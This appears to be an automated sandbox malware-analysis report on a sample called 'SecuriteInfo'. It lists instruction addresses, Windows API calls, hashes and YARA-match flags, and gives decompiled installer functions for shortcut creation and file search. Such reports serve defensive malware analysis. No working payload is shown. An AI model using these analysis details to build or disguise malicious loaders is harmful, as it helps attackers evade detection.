                                                                            0x713c21d0
                                                                            0x713c21d3
                                                                            0x713c21da
                                                                            0x713c21da
                                                                            0x713c21dd
                                                                            0x713c21e1
                                                                            0x713c21f5
                                                                            0x713c21f5
                                                                            0x713c21f8
                                                                            0x713c21fc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c21fe
                                                                            0x713c2202
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c2204
                                                                            0x713c220b
                                                                            0x713c220b
                                                                            0x713c2211
                                                                            0x713c2214
                                                                            0x713c2230
                                                                            0x713c2216
                                                                            0x713c221f
                                                                            0x713c2222
                                                                            0x713c2222
                                                                            0x00000000
                                                                            0x713c2214
                                                                            0x713c21e3
                                                                            0x713c21e6
                                                                            0x713c21ea
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c21ec
                                                                            0x00000000
                                                                            0x713c21ec
                                                                            0x713c21d5
                                                                            0x713c21d8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c21d8
                                                                            0x713c1dfe
                                                                            0x713c1dfe
                                                                            0x713c1dff
                                                                            0x713c1f49
                                                                            0x713c1f49
                                                                            0x713c1f50
                                                                            0x713c1f53
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1f60
                                                                            0x00000000
                                                                            0x713c214b
                                                                            0x713c214e
                                                                            0x713c2151
                                                                            0x713c2151
                                                                            0x713c2152
                                                                            0x713c2153
                                                                            0x713c2156
                                                                            0x713c2159
                                                                            0x713c215c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c215e
                                                                            0x713c215e
                                                                            0x713c2162
                                                                            0x713c217a
                                                                            0x713c217d
                                                                            0x713c2181
                                                                            0x713c2187
                                                                            0x00000000
                                                                            0x713c2187
                                                                            0x713c2164
                                                                            0x713c2164
                                                                            0x713c2167
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c2169
                                                                            0x713c216c
                                                                            0x713c216e
                                                                            0x713c216f
                                                                            0x713c216f
                                                                            0x713c216f
                                                                            0x713c2170
                                                                            0x713c2173
                                                                            0x713c2176
                                                                            0x713c2177
                                                                            0x713c2151
                                                                            0x713c2152
                                                                            0x713c2153
                                                                            0x713c2156
                                                                            0x713c2159
                                                                            0x713c215c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c215c
                                                                            0x00000000
                                                                            0x713c1fa7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1fb3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1f9a
                                                                            0x713c1f9e
                                                                            0x713c1fa2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c211c
                                                                            0x713c2120
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c2126
                                                                            0x713c212f
                                                                            0x713c2136
                                                                            0x713c213e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c2083
                                                                            0x713c2083
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1fbc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c21a6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c208b
                                                                            0x713c208d
                                                                            0x713c208d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c2196
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c219a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c21a2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20d3
                                                                            0x713c20d5
                                                                            0x713c20d5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c209d
                                                                            0x713c209f
                                                                            0x713c209f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20af
                                                                            0x713c20b1
                                                                            0x713c20b1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20e1
                                                                            0x713c20e3
                                                                            0x713c20e3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20ba
                                                                            0x713c20bc
                                                                            0x713c20bc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20c1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c219e
                                                                            0x713c21a8
                                                                            0x713c21a8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20ec
                                                                            0x713c20f0
                                                                            0x713c20f5
                                                                            0x713c20f8
                                                                            0x713c20f9
                                                                            0x713c20fc
                                                                            0x713c2102
                                                                            0x713c2102
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c218e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20c5
                                                                            0x713c20c7
                                                                            0x713c20c7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1fc3
                                                                            0x713c1fc3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20da
                                                                            0x713c20dc
                                                                            0x713c20dc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1f67
                                                                            0x713c1f6d
                                                                            0x713c1f70
                                                                            0x713c1f72
                                                                            0x713c1f72
                                                                            0x713c1f75
                                                                            0x713c1f79
                                                                            0x713c1f86
                                                                            0x713c1f88
                                                                            0x713c1f8e
                                                                            0x713c1f8e
                                                                            0x713c1f8e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c208e
                                                                            0x713c208e
                                                                            0x713c2090
                                                                            0x713c2097
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20d6
                                                                            0x713c20d6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20a0
                                                                            0x713c20a0
                                                                            0x713c20a2
                                                                            0x713c20a9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20b2
                                                                            0x713c20b2
                                                                            0x713c20b4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20e4
                                                                            0x713c20e4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20bd
                                                                            0x713c20bd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c210a
                                                                            0x713c210e
                                                                            0x713c2113
                                                                            0x713c2116
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20c8
                                                                            0x713c20c8
                                                                            0x713c20cb
                                                                            0x713c20cd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20dd
                                                                            0x713c20dd
                                                                            0x713c20e6
                                                                            0x713c20e6
                                                                            0x713c1fc5
                                                                            0x713c1fc5
                                                                            0x713c1fc8
                                                                            0x713c1fcf
                                                                            0x713c1fd1
                                                                            0x713c1fd3
                                                                            0x713c1fda
                                                                            0x713c1fdd
                                                                            0x713c1fe2
                                                                            0x713c1fe4
                                                                            0x713c1fe6
                                                                            0x713c1fea
                                                                            0x713c1ff0
                                                                            0x713c1ff6
                                                                            0x713c1ff6
                                                                            0x713c1ff8
                                                                            0x713c1ff8
                                                                            0x713c1ff9
                                                                            0x713c1ff9
                                                                            0x713c1ffd
                                                                            0x713c2003
                                                                            0x713c2005
                                                                            0x713c2009
                                                                            0x713c200e
                                                                            0x713c200e
                                                                            0x713c2010
                                                                            0x713c2010
                                                                            0x713c2013
                                                                            0x713c2016
                                                                            0x713c201f
                                                                            0x713c2025
                                                                            0x713c2028
                                                                            0x713c2028
                                                                            0x713c202a
                                                                            0x713c202d
                                                                            0x713c2033
                                                                            0x713c2039
                                                                            0x713c2039
                                                                            0x713c203b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c2041
                                                                            0x713c2041
                                                                            0x713c2045
                                                                            0x713c204c
                                                                            0x713c2070
                                                                            0x713c2070
                                                                            0x713c2074
                                                                            0x713c2076
                                                                            0x713c2079
                                                                            0x713c2079
                                                                            0x713c207c
                                                                            0x713c207c
                                                                            0x00000000
                                                                            0x713c2074
                                                                            0x713c2051
                                                                            0x713c2054
                                                                            0x713c2054
                                                                            0x713c205b
                                                                            0x713c205d
                                                                            0x713c2060
                                                                            0x713c2067
                                                                            0x713c2068
                                                                            0x713c206e
                                                                            0x713c206e
                                                                            0x00000000
                                                                            0x713c206e
                                                                            0x713c2062
                                                                            0x713c2065
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c2065
                                                                            0x713c1ff2
                                                                            0x713c1ff4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1f60
                                                                            0x713c1e05
                                                                            0x713c1e05
                                                                            0x713c1e06
                                                                            0x713c1f46
                                                                            0x00000000
                                                                            0x713c1f46
                                                                            0x713c1e0c
                                                                            0x713c1e0d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1e13
                                                                            0x713c1e16
                                                                            0x713c1f0b
                                                                            0x713c1f0b
                                                                            0x713c1f0e
                                                                            0x713c1f23
                                                                            0x713c1f25
                                                                            0x713c1f25
                                                                            0x713c1f26
                                                                            0x713c1f29
                                                                            0x713c1f2c
                                                                            0x713c1f38
                                                                            0x713c1f38
                                                                            0x713c1f38
                                                                            0x713c1f2e
                                                                            0x713c1f2e
                                                                            0x713c1f2e
                                                                            0x713c1f3e
                                                                            0x00000000
                                                                            0x713c1f3e
                                                                            0x713c1f10
                                                                            0x713c1f10
                                                                            0x713c1f11
                                                                            0x713c1f1f
                                                                            0x00000000
                                                                            0x713c1f1f
                                                                            0x713c1f14
                                                                            0x713c1f15
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1f1b
                                                                            0x00000000
                                                                            0x713c1f1b
                                                                            0x713c1e1c
                                                                            0x713c1f07
                                                                            0x00000000
                                                                            0x713c1f07
                                                                            0x713c1e22
                                                                            0x713c1e22
                                                                            0x713c1e25
                                                                            0x713c1e4e
                                                                            0x00000000
                                                                            0x713c1e4e
                                                                            0x713c1e27
                                                                            0x713c1e27
                                                                            0x713c1e2a
                                                                            0x713c1e44
                                                                            0x00000000
                                                                            0x713c1e44
                                                                            0x713c1e2c
                                                                            0x713c1e2c
                                                                            0x713c1e2f
                                                                            0x713c1e3e
                                                                            0x00000000
                                                                            0x713c1e3e
                                                                            0x713c1e32
                                                                            0x713c1e33
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1e35
                                                                            0x00000000
                                                                            0x713c1cec
                                                                            0x713c1cec
                                                                            0x713c1cef
                                                                            0x00000000
                                                                            0x713c1cef
                                                                            0x713c1ce6
                                                                            0x713c1cd3
                                                                            0x713c1cd8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1cda
                                                                            0x713c1cdd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1cdd
                                                                            0x713c1c6d
                                                                            0x713c1c70
                                                                            0x713c1ca6
                                                                            0x713c1ca9
                                                                            0x00000000
                                                                            0x713c1caf
                                                                            0x713c1cb1
                                                                            0x713c1cb5
                                                                            0x713c1cbc
                                                                            0x713c1cc3
                                                                            0x713c1cc6
                                                                            0x713c1cc9
                                                                            0x00000000
                                                                            0x713c1cc9
                                                                            0x713c1ca9
                                                                            0x713c1c72
                                                                            0x713c1c73
                                                                            0x713c1c8e
                                                                            0x713c1c91
                                                                            0x00000000
                                                                            0x713c1c97
                                                                            0x713c1c97
                                                                            0x713c1c9e
                                                                            0x713c1ca1
                                                                            0x00000000
                                                                            0x713c1ca1
                                                                            0x713c1c91
                                                                            0x713c1c78
                                                                            0x00000000
                                                                            0x713c1c7e
                                                                            0x713c1c7e
                                                                            0x713c1c85
                                                                            0x00000000
                                                                            0x713c1c85
                                                                            0x713c1c78
                                                                            0x713c1e74
                                                                            0x713c1e79
                                                                            0x713c1e7e
                                                                            0x713c1e82
                                                                            0x713c2355
                                                                            0x713c235b
                                                                            0x713c1e94
                                                                            0x713c1e96
                                                                            0x713c1e97
                                                                            0x713c227e
                                                                            0x713c227e
                                                                            0x713c2281
                                                                            0x713c2284
                                                                            0x713c22a1
                                                                            0x713c22a7
                                                                            0x713c22a9
                                                                            0x713c22af
                                                                            0x713c22c6
                                                                            0x713c22c6
                                                                            0x713c22c6
                                                                            0x713c22d3
                                                                            0x713c22d9
                                                                            0x713c22dc
                                                                            0x713c22e2
                                                                            0x713c22e4
                                                                            0x713c22e8
                                                                            0x713c22ea
                                                                            0x713c22f1
                                                                            0x713c22f6
                                                                            0x713c22f9
                                                                            0x713c22fb
                                                                            0x713c2300
                                                                            0x713c2312
                                                                            0x713c2312
                                                                            0x713c2300
                                                                            0x713c22f9
                                                                            0x713c22e8
                                                                            0x713c2318
                                                                            0x713c231b
                                                                            0x713c2325
                                                                            0x713c232d
                                                                            0x713c233a
                                                                            0x713c2340
                                                                            0x713c2343
                                                                            0x713c2273
                                                                            0x713c2273
                                                                            0x00000000
                                                                            0x713c2273
                                                                            0x713c2349
                                                                            0x713c234f
                                                                            0x713c234f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c2351
                                                                            0x713c2351
                                                                            0x713c2351
                                                                            0x713c2351
                                                                            0x00000000
                                                                            0x713c231d
                                                                            0x713c231d
                                                                            0x713c2323
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c2323
                                                                            0x713c231b
                                                                            0x713c22b2
                                                                            0x713c22b8
                                                                            0x713c22ba
                                                                            0x713c22c0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c22c0
                                                                            0x713c2286
                                                                            0x713c228d
                                                                            0x713c2293
                                                                            0x713c2299
                                                                            0x00000000
                                                                            0x713c2299
                                                                            0x713c1e9d
                                                                            0x713c1e9e
                                                                            0x713c225d
                                                                            0x713c225d
                                                                            0x713c2263
                                                                            0x713c2266
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c226d
                                                                            0x713c2272
                                                                            0x00000000
                                                                            0x713c2272
                                                                            0x713c1ea5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1eab
                                                                            0x713c1eab
                                                                            0x713c1eb4
                                                                            0x713c1eb9
                                                                            0x713c1ebf
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1ec5
                                                                            0x713c1ed2
                                                                            0x713c1ed8
                                                                            0x713c1ee2
                                                                            0x713c1ee8
                                                                            0x713c1ef0
                                                                            0x713c1f00
                                                                            0x00000000
                                                                            0x713c1f00

                                                                            APIs
                                                                              • Part of subcall function 713C12BB: GlobalAlloc.KERNEL32(00000040,?,713C12DB,?,713C137F,00000019,713C11CA,-000000A0), ref: 713C12C5
                                                                            • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 713C1D2D
                                                                            • lstrcpyW.KERNEL32(00000008,?), ref: 713C1D75
                                                                            • lstrcpyW.KERNEL32(00000808,?), ref: 713C1D7F
                                                                            • GlobalFree.KERNEL32(00000000), ref: 713C1D92
                                                                            • GlobalFree.KERNEL32(?), ref: 713C1E74
                                                                            • GlobalFree.KERNEL32(?), ref: 713C1E79
                                                                            • GlobalFree.KERNEL32(?), ref: 713C1E7E
                                                                            • GlobalFree.KERNEL32(00000000), ref: 713C2068
                                                                            • lstrcpyW.KERNEL32(?,?), ref: 713C2222
                                                                            • GetModuleHandleW.KERNEL32(00000008), ref: 713C22A1
                                                                            • LoadLibraryW.KERNEL32(00000008), ref: 713C22B2
                                                                            • GetProcAddress.KERNEL32(?,?), ref: 713C230C
                                                                            • lstrlenW.KERNEL32(00000808), ref: 713C2326
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206470499574.00000000713C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 713C0000, based on PE: true
                                                                            • Associated: 00000002.00000002.206470427248.00000000713C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206470593147.00000000713C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206470665891.00000000713C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_713c0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                            • String ID:
                                                                            • API String ID: 245916457-0
                                                                            • Opcode ID: 5a14d3550815f832db113a28f9b1c4a2c0c460955dea0377756dc883eb06d4b8
                                                                            • Instruction ID: 090ec0b801579ac9f6f9f2ad213c861905471b5d8d27991e53b56fc10688fc97
                                                                            • Opcode Fuzzy Hash: 5a14d3550815f832db113a28f9b1c4a2c0c460955dea0377756dc883eb06d4b8
                                                                            • Instruction Fuzzy Hash: 15229C71D0420ADEDB12DFA8C984AEEBBB9FB04B19F10452ED166E22C4D770DD85EB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 67%
                                                                            			E004021AA(void* __eflags) {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Temp");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                                            0x004021b3
                                                                            0x004021bd
                                                                            0x004021c7
                                                                            0x004021d1
                                                                            0x004021dc
                                                                            0x004021df
                                                                            0x004021f9
                                                                            0x004021fc
                                                                            0x00402202
                                                                            0x00402205
                                                                            0x0040220f
                                                                            0x00402213
                                                                            0x00402213
                                                                            0x00402218
                                                                            0x00402229
                                                                            0x00402231
                                                                            0x004022e8
                                                                            0x004022e8
                                                                            0x004022ef
                                                                            0x00402237
                                                                            0x00402237
                                                                            0x00402246
                                                                            0x0040224a
                                                                            0x0040224d
                                                                            0x00402253
                                                                            0x00402261
                                                                            0x00402264
                                                                            0x00402266
                                                                            0x00402271
                                                                            0x00402271
                                                                            0x00402276
                                                                            0x00402278
                                                                            0x0040227f
                                                                            0x0040227f
                                                                            0x00402282
                                                                            0x0040228b
                                                                            0x0040228e
                                                                            0x00402294
                                                                            0x00402296
                                                                            0x004022a0
                                                                            0x004022a0
                                                                            0x004022a3
                                                                            0x004022ac
                                                                            0x004022af
                                                                            0x004022b8
                                                                            0x004022be
                                                                            0x004022c0
                                                                            0x004022ce
                                                                            0x004022ce
                                                                            0x004022d1
                                                                            0x004022d7
                                                                            0x004022d7
                                                                            0x004022da
                                                                            0x004022e0
                                                                            0x004022e6
                                                                            0x004022fb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004022e6
                                                                            0x004022f1
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                            • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInstance
                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                            • API String ID: 542301482-670666241
                                                                            • Opcode ID: c4fc3fa67b876c583326420a1baafc892d445f4eb77b454d3c92970a980d6818
                                                                            • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                                                                            • Opcode Fuzzy Hash: c4fc3fa67b876c583326420a1baafc892d445f4eb77b454d3c92970a980d6818
                                                                            • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ABAF38 Relevance: 1.9, Strings: 1, Instructions: 687COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryLoadMemoryProtectVirtual
                                                                            • String ID: ,oQ_
                                                                            • API String ID: 3389902171-3495912439
                                                                            • Opcode ID: cd04949fb238fde32bce57ffecfb5dafd803ec9c85407875bfd3d0fffe380201
                                                                            • Instruction ID: c5b718720a444646865ed57402796bf910d661e980ffed224d537794678ea64a
                                                                            • Opcode Fuzzy Hash: cd04949fb238fde32bce57ffecfb5dafd803ec9c85407875bfd3d0fffe380201
                                                                            • Instruction Fuzzy Hash: 18423A319083858FDB32CF38C9987DABBA2AF16354F49869ECC994F197D7318545C722
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 39%
                                                                            			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040653D();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                                            0x00402923
                                                                            0x0040293e
                                                                            0x00402949
                                                                            0x0040294a
                                                                            0x00402a94
                                                                            0x00402925
                                                                            0x00402928
                                                                            0x0040292b
                                                                            0x0040292e
                                                                            0x0040292e
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID:
                                                                            • API String ID: 1974802433-0
                                                                            • Opcode ID: db3e0d9fc2be9d26385cb54e60570df6e1e2b9abacb98404d6fb5f3e13457c69
                                                                            • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                                                                            • Opcode Fuzzy Hash: db3e0d9fc2be9d26385cb54e60570df6e1e2b9abacb98404d6fb5f3e13457c69
                                                                            • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ABCAB0 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: cVOe
                                                                            • API String ID: 0-719262702
                                                                            • Opcode ID: 876f3ca5c79b0974cc56d30b47101a55e2e5c5a58a67aa35ebf6978a26d55005
                                                                            • Instruction ID: 3943170b7a3e1936357336fd2659ecde42d3917333bfb7d9f2be092c7b5c8532
                                                                            • Opcode Fuzzy Hash: 876f3ca5c79b0974cc56d30b47101a55e2e5c5a58a67aa35ebf6978a26d55005
                                                                            • Instruction Fuzzy Hash: 5341E234604305CFDB3A9F24C5F9BEA77ABEF55264F45816ECC8A4B152CB798485CA02
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AAE573 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `
                                                                            • API String ID: 0-1850852036
                                                                            • Opcode ID: ed2963ef7ac6d3e446b1c72a177f6b842a297acf441d34ccae2e1542e5ed2e0c
